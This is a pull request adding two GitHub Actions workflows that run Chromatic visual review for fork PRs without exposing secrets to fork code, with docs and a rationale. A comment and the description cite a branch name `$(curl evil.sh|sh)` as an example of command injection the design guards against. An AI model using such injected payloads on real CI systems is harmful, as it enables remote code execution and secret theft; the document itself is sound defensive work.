### PR TITLE
ci(chromatic): add visual review for fork pull requests

### DIFF
--- a/.github/workflows/chromatic-fork-build.yml
+++ b/.github/workflows/chromatic-fork-build.yml
@@ -1,0 +1,63 @@
+name: 🎨 Chromatic Fork — Build
+
+# ── Part 1 of 2: build only, no secrets ─────────────────────────────────────
+#
+# GitHub deliberately withholds repository secrets from `pull_request` runs
+# triggered by a fork, so the main chromatic.yml workflow skips fork PRs — which
+# is nearly every contribution to this repo.
+#
+# The fix is to split the work across a trust boundary:
+#
+#   1. THIS workflow runs untrusted fork code (bun install, storybook build)
+#      with no secrets and a read-only token, and uploads the built Storybook
+#      as an artifact. A malicious PR gets nothing worth stealing.
+#
+#   2. chromatic-fork-publish.yml is triggered by this run completing. It has
+#      the token, but only ever downloads that artifact and uploads it to
+#      Chromatic — it never executes fork code.
+#
+# The alternative, switching chromatic.yml to `pull_request_target`, would run
+# fork code *with* our secrets in scope. Don't do that.
+
+on:
+  pull_request:
+    branches: [main]
+
+# No secrets are used here, and the token is read-only.
+permissions:
+  contents: read
+
+concurrency:
+  group: chromatic-fork-build-${{ github.event.pull_request.number }}
+  cancel-in-progress: true
+
+jobs:
+  build:
+    name: Build Storybook (fork)
+    runs-on: ubuntu-latest
+
+    # Same-repo PRs already get a full Chromatic run from chromatic.yml, which
+    # can use the secret directly. Restricting this to forks avoids building
+    # and snapshotting every same-repo PR twice.
+    if: github.event.pull_request.head.repo.full_name != github.repository
+
+    steps:
+      - name: Checkout PR code
+        uses: actions/checkout@v6
+
+      - name: Setup Bun
+        uses: oven-sh/setup-bun@v2
+
+      - name: Install dependencies
+        run: bun install
+
+      - name: Build Storybook
+        run: bun run build-storybook
+
+      - name: Upload built Storybook
+        uses: actions/upload-artifact@v4
+        with:
+          name: storybook-static
+          path: storybook-static
+          retention-days: 1
+          if-no-files-found: error

--- a/.github/workflows/chromatic-fork-publish.yml
+++ b/.github/workflows/chromatic-fork-publish.yml
@@ -1,0 +1,87 @@
+name: 🎨 Chromatic Fork — Publish
+
+# ── Part 2 of 2: has the token, never runs fork code ────────────────────────
+#
+# Triggered by "Chromatic Fork — Build" finishing. `workflow_run` workflows are
+# always taken from the default branch and run in the context of the base
+# repository, which is why this one can hold CHROMATIC_PROJECT_TOKEN safely.
+#
+# The rules that keep that safe, all of which matter:
+#
+#   * Check out the BASE repo (default ref), never the PR head. Everything
+#     executed here — bun install, the chromatic CLI — comes from trusted main.
+#   * The only fork-derived input is the built Storybook artifact. It is
+#     uploaded to Chromatic and rendered in *their* sandbox; it is never
+#     executed in this runner.
+#   * Untrusted strings (branch names, repo slugs) are passed through `env:`
+#     and quoted, never interpolated straight into a `run:` block, where a
+#     branch called `$(curl evil.sh|sh)` would otherwise execute.
+#
+# NOTE: workflow_run only fires for workflow files present on the DEFAULT
+# branch, so this has no effect until it is merged to main.
+
+on:
+  workflow_run:
+    workflows: ["🎨 Chromatic Fork — Build"]
+    types: [completed]
+
+permissions:
+  contents: read
+  actions: read   # required to download the artifact from the triggering run
+
+concurrency:
+  group: chromatic-fork-publish-${{ github.event.workflow_run.head_sha }}
+  cancel-in-progress: true
+
+jobs:
+  publish:
+    name: Visual regression (fork)
+    runs-on: ubuntu-latest
+    if: github.event.workflow_run.conclusion == 'success'
+
+    steps:
+      # Trusted code only: the default branch of this repo, not the PR head.
+      - name: Checkout base repository
+        uses: actions/checkout@v6
+        with:
+          fetch-depth: 0
+
+      - name: Download Storybook built from the fork
+        uses: actions/download-artifact@v4
+        with:
+          name: storybook-static
+          path: storybook-static
+          run-id: ${{ github.event.workflow_run.id }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+
+      # Chromatic resolves CHROMATIC_SHA against local git history to pick a
+      # baseline. The fork's commit isn't in this clone, so fetch it. Without
+      # this Chromatic still runs, but warns and loses commit ancestry.
+      - name: Fetch the fork's commit for baseline ancestry
+        env:
+          FORK_SLUG: ${{ github.event.workflow_run.head_repository.full_name }}
+          FORK_BRANCH: ${{ github.event.workflow_run.head_branch }}
+        run: |
+          git fetch --no-tags --depth=50 \
+            "https://github.com/${FORK_SLUG}.git" "${FORK_BRANCH}" || \
+            echo "Could not fetch fork ref; Chromatic will fall back to a shallow association."
+
+      - name: Setup Bun
+        uses: oven-sh/setup-bun@v2
+
+      # Installs from the base repo's package.json + bun.lock, not the fork's.
+      - name: Install dependencies
+        run: bun install
+
+      - name: Publish to Chromatic
+        env:
+          # Chromatic reads these to attribute the build to the fork's PR
+          # rather than to main. Verified against the CLI's own env handling.
+          CHROMATIC_SHA: ${{ github.event.workflow_run.head_sha }}
+          CHROMATIC_BRANCH: ${{ github.event.workflow_run.head_repository.full_name }}:${{ github.event.workflow_run.head_branch }}
+          CHROMATIC_SLUG: ${{ github.event.workflow_run.head_repository.full_name }}
+          CHROMATIC_PROJECT_TOKEN: ${{ secrets.CHROMATIC_PROJECT_TOKEN }}
+        run: |
+          bunx chromatic \
+            --storybook-build-dir storybook-static \
+            --exit-zero-on-changes

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -31,6 +31,7 @@ If you're ready to tackle some open issues, **[we've collected some good first i
 - [Claiming Issues](#-claiming-issues)
 - [Making Changes](#making-changes)
 - [Submitting a Pull Request](#submitting-a-pull-request)
+- [Visual Review (Chromatic)](#visual-review-chromatic)
 - [Code Style](#code-style)
 - [Development Tips](#development-tips)
 - [GSSoC'26 Participants](#gssoc26-participants)
@@ -356,6 +357,36 @@ Attach the recording directly to the PR by dragging the file into the GitHub com
 - [ ] Accessibility: new interactive elements have ARIA labels
 - [ ] Issue number referenced in PR description
 - [ ] **Screen recording attached** (required for all UI/feature PRs)
+
+---
+
+## Visual Review (Chromatic)
+
+Every PR gets its Storybook screenshotted and diffed against `main` by
+[Chromatic](https://www.chromatic.com/), so UI changes are reviewed visually
+rather than guessed at from a diff.
+
+You'll see up to three checks:
+
+| Check | What it means |
+|---|---|
+| `Storybook Publish` | Your Storybook built and uploaded |
+| `UI Tests` | Snapshots compared against the baseline |
+| `Visual regression` / `Visual regression (fork)` | The workflow that ran it |
+
+**Visual changes do not fail your PR.** If `UI Tests` says changes need
+accepting, that is a maintainer's call, not a problem with your branch — a
+maintainer accepts or rejects each change in the Chromatic UI.
+
+If your PR touches a component, please **add or update its story** in
+`src/components/<Component>.stories.tsx`. Stories are what Chromatic can see;
+a change with no story gets no visual review.
+
+Avoid anything time-dependent inside a story — live clocks, carousels,
+autoplaying animations. A screenshot taken at an arbitrary moment will differ
+between runs and report a change that isn't real. Existing examples:
+`ExportOverlay` marks its spinner and tip carousel `data-chromatic="ignore"`,
+and `TrimControl` passes `file={null}` to avoid async audio decoding.
 
 ---
 


### PR DESCRIPTION
Follow-up to #1749. That PR set up Chromatic but **deliberately skipped fork PRs**, because GitHub withholds repository secrets from `pull_request` runs triggered by a fork. Since nearly every contribution here comes from a fork, visual review currently covers almost nothing.

This adds the two-workflow split Chromatic documents for forks.

## How it works

| Workflow | Trigger | Secrets | Runs fork code? |
|---|---|---|---|
| `chromatic-fork-build.yml` | `pull_request` | none, read-only token | **yes** — builds Storybook, uploads it as an artifact |
| `chromatic-fork-publish.yml` | `workflow_run` | holds the token | **no** — downloads that artifact and publishes it |

The trust boundary is the artifact. Untrusted code runs where there is nothing to steal; the token lives where no untrusted code executes.

## Why not `pull_request_target`

Because it runs fork code with our secrets in scope — the precise vulnerability this pattern exists to avoid. Any PR could exfiltrate `CHROMATIC_PROJECT_TOKEN` (and anything else in the repo's secrets) by editing a build script.

## Safety details

- The publish job checks out the **base repo's default branch, never the PR head**, so `bun install` and the `chromatic` CLI all come from trusted `main`.
- The only fork-derived input is the built Storybook. It is uploaded to Chromatic and rendered in **their** sandbox — never executed on our runner.
- Untrusted strings (fork branch name, repo slug) go through `env:` and are quoted, never interpolated into a `run:` block. A branch named `$(curl evil.sh | sh)` would otherwise execute.
- Build attribution uses `CHROMATIC_SHA` / `CHROMATIC_BRANCH` / `CHROMATIC_SLUG` taken from the **trusted** `workflow_run` payload, not from the artifact, so a fork can't forge which branch a build belongs to.

## Cost

The fork build is gated on `head.repo != this repo`, so same-repo PRs are still handled by `chromatic.yml` alone and aren't built or snapshotted twice.

## Docs

`CONTRIBUTING.md` gains a **Visual Review (Chromatic)** section explaining what the checks mean, that **visual changes never fail a contributor's PR** (a maintainer accepts or rejects them), that PRs touching a component should add or update its story, and that stories must avoid time-dependent content.

## Note on rollout

`workflow_run` only fires for workflow files present on the **default branch**, so this has no effect until it is merged. The first fork PR opened after merge is the real test.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01NhT15Aq6XUyhZSHa2HAh57